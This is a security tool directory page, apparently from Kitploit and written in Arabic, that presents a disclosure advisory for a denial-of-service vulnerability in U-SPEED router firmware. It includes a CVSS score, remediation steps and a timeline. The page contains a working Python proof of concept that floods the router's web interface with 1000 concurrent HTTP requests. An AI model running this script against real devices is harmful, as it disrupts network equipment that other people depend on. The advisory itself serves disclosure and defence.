Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-36958 — إثبات المفهوم لـ CVE-2026-36958، وهي ثغرة رفض خدمة في برنامج جهاز التوجيه U-SPEED تستنزف الموارد عبر طلبات HTTP المتزامنة، مما يتسبب في توقف الواجهة الإلكترونية عن الاستجابة. | Kitploit
أدوات/GitHubGitHub/kirubel-cve/cve-2026-36958
تحليل الثغرات الأمنيةالاستغلالأمن الويبأمن الشبكاتاختبار الاختراق
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

إثبات المفهوم لـ CVE-2026-36958، وهي ثغرة رفض خدمة في برنامج جهاز التوجيه U-SPEED تستنزف الموارد عبر طلبات HTTP المتزامنة، مما يتسبب في توقف الواجهة الإلكترونية عن الاستجابة.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-36958: رفض الخدمة عبر طلبات HTTP المتزامنة

معرف CVE: CVE-2026-36958 التاريخ: 2026-04-29 المكتشف: Kirubel Solomne البائع: U-SPEED المنتج: راوتر U-SPEED إصدار البرنامج الثابت: V1.0.0 CWE: CWE-400 - استهلاك غير متحكم فيه للموارد


الوصف

البرنامج الثابت V1.0.0 لراوتر U-SPEED عرضة لرفض الخدمة. من خلال إرسال عدد كبير من طلبات HTTP المتزامنة إلى نقاط نهاية عشوائية أو غير موجودة على واجهة الإدارة عبر الويب، يمكن للمهاجم استنزاف موارد النظام في خادم Boa HTTP المدمج. يؤدي هذا إلى توقف واجهة الويب الخاصة بالراوتر عن الاستجابة وقد يتطلب إعادة تشغيل يدوية لاستعادة التشغيل الطبيعي.


درجة CVSS

درجة CVSS v3.1: 7.5 (عالية) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المقياسالقيمة
ناقل الهجومالشبكة
تعقيد الهجوممنخفض
الامتيازات المطلوبةلا شيء
تفاعل المستخدملا شيء
تأثير السريةلا شيء
تأثير السلامةلا شيء
تأثير التوافرعالي

إثبات المفهوم

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

السلوك المتوقع: يجب أن يتعامل الخادم مع الاتصالات المتزامنة بشكل سلس. السلوك الفعلي: تصبح واجهة الويب غير مستجيبة؛ يلزم إعادة تشغيل يدوية.


التأثير

  • تصبح واجهة الإدارة عبر الويب غير متاحة
  • احتمال تعطل خدمات التوجيه
  • يتطلب إعادة تشغيل يدوية لاستعادة الوظائف

المعالجة

  • تنفيذ تحديد معدل الاتصالات على خادم الويب Boa
  • تحديد الحد الأقصى للاتصالات المتزامنة لكل عنوان IP مصدر
  • إضافة آلية استرداد/مراقبة تلقائية

الجدول الزمني للإفصاح

التاريخالحدث
2026-04-29تم اكتشاف الثغرة
2026-04-29تم الإبلاغ إلى MITRE
2026-04-29تم تعيين CVE-2026-36958
2026-04-29الإفصاح العام

المراجع

  • MITRE CVE-2026-36958
  • CWE-400
  • موقع البائع
تنزيل الأداة